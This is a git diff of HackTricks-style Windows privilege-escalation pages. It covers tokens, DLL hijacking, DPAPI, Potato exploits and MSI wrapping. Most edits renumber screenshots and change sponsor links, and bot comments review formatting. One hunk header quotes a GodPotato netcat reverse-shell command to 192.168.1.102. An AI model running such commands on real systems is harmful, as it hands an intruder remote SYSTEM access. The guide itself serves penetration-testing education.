-![](<../../.gitbook/assets/image (726).png>)
+![](<../../.gitbook/assets/image (729).png>)
Basically, if you can **overwrite any of the DLLs** that are going to be executed, you could **escalate privileges** if that DLL is going to be executed by a different user.
diff --git a/windows-hardening/windows-local-privilege-escalation/access-tokens.md b/windows-hardening/windows-local-privilege-escalation/access-tokens.md
index ac7f98903..eeda2852e 100644
--- a/windows-hardening/windows-local-privilege-escalation/access-tokens.md
+++ b/windows-hardening/windows-local-privilege-escalation/access-tokens.md
@@ -14,7 +14,7 @@
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -24,7 +24,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Access Tokens
@@ -78,7 +78,7 @@ SeTimeZonePrivilege Change the time zone Disabled
or using _Process Explorer_ from Sysinternals (select process and access"Security" tab):
-![](<../../.gitbook/assets/image (769).png>)
+![](<../../.gitbook/assets/image (772).png>)
### Local administrator
@@ -131,10 +131,9 @@ Take a look to [**all the possible token privileges and some definitions on this
Learn more about tokens in this tutorials: [https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa](https://medium.com/@seemant.bisht24/understanding-and-abusing-process-tokens-part-i-ee51671f2cfa) and [https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)
-
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
diff --git a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
index 5a30c6e0a..8f65a7518 100644
--- a/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
+++ b/windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md
@@ -1,12 +1,12 @@
# ACLs - DACLs/SACLs/ACEs
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces" %}
@@ -92,7 +92,7 @@ By doing things this way, the owner of a file or folder can be very precise abou
So, this **"canonical order"** is all about making sure the access rules are clear and work well, putting specific rules first and organizing everything in a smart way.
-
+
\
Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
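Review bot: The Trickest link in the last context line of this hunk still uses the old `?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks` query string, while the banners at the top and bottom of this same file are switched to the `utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces` form in this commit. Update the mid-page banner as well, or say why it keeps the old parameters; as submitted, the file carries two tracking schemes, the escaped-underscore style and the `hacktrics` misspelling.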
@@ -191,10 +191,10 @@ Other ways to support HackTricks:
-
+
\
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
+Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
Get Access Today:
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
+{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=acls-dacls-sacls-aces" %}
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
index 722235ba1..d4879c7fb 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/README.md
@@ -39,13 +39,13 @@ Several methods are employed for DLL hijacking, each with its effectiveness depe
The most common way to find missing Dlls inside a system is running [procmon](https://docs.microsoft.com/en-us/sysinternals/downloads/procmon) from sysinternals, **setting** the **following 2 filters**:
-![](<../../../.gitbook/assets/image (958).png>)
+![](<../../../.gitbook/assets/image (961).png>)
-![](<../../../.gitbook/assets/image (227).png>)
+![](<../../../.gitbook/assets/image (230).png>)
and just show the **File System Activity**:
-![](<../../../.gitbook/assets/image (150).png>)
+![](<../../../.gitbook/assets/image (153).png>)
If you are looking for **missing dlls in general** you **leave** this running for some **seconds**.\
If you are looking for a **missing dll inside an specific executable** you should set **another filter like "Process Name" "contains" "\", execute it, and stop capturing events**.
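Review bot: The "following 2 filters" in this hunk exist only as two screenshots with empty alt text (`![](...)`), and this commit renumbers exactly those assets, so a wrong number would silently change what the reader is told to configure. Write the two filters out in the text next to the images and give each image alt text. Also, the last context line reads `"Process Name" "contains" "\"`, where the filter value looks like a lost placeholder; worth restoring while the file is open.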
diff --git a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
index 25f47c4bf..1f9ece223 100644
--- a/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
+++ b/windows-hardening/windows-local-privilege-escalation/dll-hijacking/writable-sys-path-+dll-hijacking-privesc.md
@@ -59,13 +59,13 @@ if ($envPath -notlike "*$folderPath*") {
* **After** the **file** is **generated**, **close** the opened **`procmon`** window and **open the events file**.
* Add these **filters** and you will find all the Dlls that some **proccess tried to load** from the writable System Path folder:
-
+
### Missed Dlls
Running this in a free **virtual (vmware) Windows 11 machine** I got these results:
-
+
In this case the .exe are useless so ignore them, the missed DLLs where from:
diff --git a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
index 4b4e5b616..1ee2e527f 100644
--- a/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
+++ b/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
@@ -86,7 +86,7 @@ Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
This is what a bunch of Master Keys of a user will looks like:
-![](<../../.gitbook/assets/image (1118).png>)
+![](<../../.gitbook/assets/image (1121).png>)
Usually **each master keys is an encrypted symmetric key that can decrypt other content**. Therefore, **extracting** the **encrypted Master Key** is interesting in order to **decrypt** later that **other content** encrypted with it.
diff --git a/windows-hardening/windows-local-privilege-escalation/integrity-levels.md b/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
index 386e26bf9..f7e7fc8cd 100644
--- a/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
+++ b/windows-hardening/windows-local-privilege-escalation/integrity-levels.md
@@ -16,7 +16,7 @@ Other ways to support HackTricks:
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
## Integrity Levels
@@ -43,11 +43,11 @@ A key rule is that objects can't be modified by processes with a lower integrity
You can get the integrity level of a process using **Process Explorer** from **Sysinternals**, accessing the **properties** of the process and viewing the "**Security**" tab:
-![](<../../.gitbook/assets/image (821).png>)
+![](<../../.gitbook/assets/image (824).png>)
You can also get your **current integrity level** using `whoami /groups`
-![](<../../.gitbook/assets/image (322).png>)
+![](<../../.gitbook/assets/image (325).png>)
### Integrity Levels in File-system
@@ -113,7 +113,7 @@ C:\Windows\System32\cmd-low.exe NT AUTHORITY\SYSTEM:(I)(F)
Now, when I run `cmd-low.exe` it will **run under a low-integrity level** instead of a medium one:
-![](<../../.gitbook/assets/image (310).png>)
+![](<../../.gitbook/assets/image (313).png>)
For curious people, if you assign high integrity level to a binary (`icacls C:\Windows\System32\cmd-high.exe /setintegritylevel high`) it won't run with high integrity level automatically (if you invoke it from a medium integrity level --by default-- it will run under a medium integrity level).
@@ -123,10 +123,9 @@ Not all files and folders have a minimum integrity level, **but all processes ar
Due to the restrictions commented in this and the previous section, from a security point of view, it's always **recommended to run a process in the lower level of integrity possible**.
-
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -136,7 +135,6 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
-
Learn AWS hacking from zero to hero withhtARTE (HackTricks AWS Red Team Expert)!
diff --git a/windows-hardening/windows-local-privilege-escalation/juicypotato.md b/windows-hardening/windows-local-privilege-escalation/juicypotato.md
index 59cec20d5..9692effa2 100644
--- a/windows-hardening/windows-local-privilege-escalation/juicypotato.md
+++ b/windows-hardening/windows-local-privilege-escalation/juicypotato.md
@@ -14,7 +14,7 @@
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -24,7 +24,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
{% hint style="warning" %}
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. _**Check:**_
@@ -133,7 +133,7 @@ c:\Users\Public>
### Launch a new CMD (if you have RDP access)
-![](<../../.gitbook/assets/image (297).png>)
+![](<../../.gitbook/assets/image (300).png>)
## CLSID Problems
@@ -157,7 +157,7 @@ Then download [test\_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/maste
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
diff --git a/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md b/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
index 6c1bf2c30..d8180b055 100644
--- a/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
+++ b/windows-hardening/windows-local-privilege-escalation/leaked-handle-exploitation.md
@@ -18,7 +18,7 @@ Other ways to support HackTricks:
Handles in a process allow to **access** different **Windows resources**:
-![RootedCON2022 - Exploiting Leaked Handles for LPE](<../../.gitbook/assets/image (243).png>)
+![RootedCON2022 - Exploiting Leaked Handles for LPE](<../../.gitbook/assets/image (246).png>)
There have been already several **privilege escalation** cases where a **privileged process** with **open and inheritable handles** have **run** an **unprivileged process** giving it **access to all those handles**.
@@ -65,17 +65,17 @@ Note that in order to **see all the handles of all the processes, the SeDebugPri
To see the handles of a process, right click in the process and select Handles:
-![](<../../.gitbook/assets/image (613).png>)
+![](<../../.gitbook/assets/image (616).png>)
You can then right click on the handle and **check the permissions**:
-![](<../../.gitbook/assets/image (943).png>)
+![](<../../.gitbook/assets/image (946).png>)
### Sysinternals Handles
The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)binary from Sysinternals will also list the handles per process in the console:
-![](<../../.gitbook/assets/image (717).png>)
+![](<../../.gitbook/assets/image (720).png>)
### LeakedHandlesFinder
diff --git a/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md b/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
index 23165f1d7..c565eb5a8 100644
--- a/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
+++ b/windows-hardening/windows-local-privilege-escalation/msi-wrapper.md
@@ -15,15 +15,15 @@
Download the free version app from [https://www.exemsi.com/documentation/getting-started/](https://www.exemsi.com/download/), execute it and wrap the "malicious" binary on it.\
Note that you can wrap a "**.bat**" if you **just** want to **execute** **command lines (instead of cmd.exe select the .bat file)**
-![](<../../.gitbook/assets/image (414).png>)
+![](<../../.gitbook/assets/image (417).png>)
And this is the most important part of the configuration:
-![](<../../.gitbook/assets/image (308).png>)
+![](<../../.gitbook/assets/image (312).png>)
-![](<../../.gitbook/assets/image (343).png>)
+![](<../../.gitbook/assets/image (346).png>)
-![](<../../.gitbook/assets/image (1069).png>)
+![](<../../.gitbook/assets/image (1072).png>)
(Please, note that if you try to pack your own binary you will be able to modify these values)
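Review bot: The second image in this hunk moves from `image (308).png` to `image (312).png`, a shift of four, while the other three here (414 to 417, 343 to 346, 1069 to 1072) and every other image reference visible in this part of the commit shift by three. Confirm that (312) is the screenshot that belongs under "the most important part of the configuration"; the assets are binary in this diff, so a wrong renumbering cannot be caught by reading it.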
diff --git a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
index 59e0fdc65..4f87e88b0 100644
--- a/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
+++ b/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
@@ -9,14 +9,14 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
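Review bot: The changed Twitter link now has a backslash inside the URL target (`https://twitter.com/hacktricks\_live`), the opposite of what this commit does to the Trickest links in acls-dacls-sacls-aces.md, where the `utm\_campaign` style escapes are removed from the URL. Pick one convention for link destinations; the unescaped form is the safer one, because a renderer that does not process escapes inside link destinations would produce a broken URL. The same line labels the link `@carlospolopm` while the target is `hacktricks_live`, and the identical edit is repeated in the hunk at `@@ -117,7 +118,7 @@` of this file.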
@@ -26,7 +26,7 @@ You can check their website and try their engine for **free** at:
{% embed url="https://whiteintel.io" %}
----
+***
{% hint style="warning" %}
**JuicyPotato doesn't work** on Windows Server 2019 and Windows 10 build 1809 onwards. However, [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) can be used to **leverage the same privileges and gain `NT AUTHORITY\SYSTEM`** level access. This [blog post](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) goes in-depth on the `PrintSpoofer` tool, which can be used to abuse impersonation privileges on Windows 10 and Server 2019 hosts where JuicyPotato no longer works.
@@ -90,6 +90,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
```
## References
+
* [https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)
* [https://github.com/itm4n/PrintSpoofer](https://github.com/itm4n/PrintSpoofer)
* [https://github.com/antonioCoco/RoguePotato](https://github.com/antonioCoco/RoguePotato)
@@ -98,7 +99,7 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
### [WhiteIntel](https://whiteintel.io)
-
+
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
@@ -117,7 +118,7 @@ Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md b/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
index 8c2d99274..62c04284c 100644
--- a/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
+++ b/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md
@@ -181,13 +181,13 @@ Let's check current Administrator permissions over `svchost.exe` processes with
5. Select "Administrators" and click on "Edit"
6. Click on "Show advanced permissions"
-![](<../../.gitbook/assets/image (434).png>)
+![](<../../.gitbook/assets/image (437).png>)
The previous image contains all the privileges that "Administrators" have over the selected process (as you can see in case of `svchost.exe` they only have "Query" privileges)
See the privileges "Administrators" have over `winlogon.exe`:
-![](<../../.gitbook/assets/image (1099).png>)
+![](<../../.gitbook/assets/image (1102).png>)
Inside that process "Administrators" can "Read Memory" and "Read Permissions" which probably allows Administrators to impersonate the token used by this process.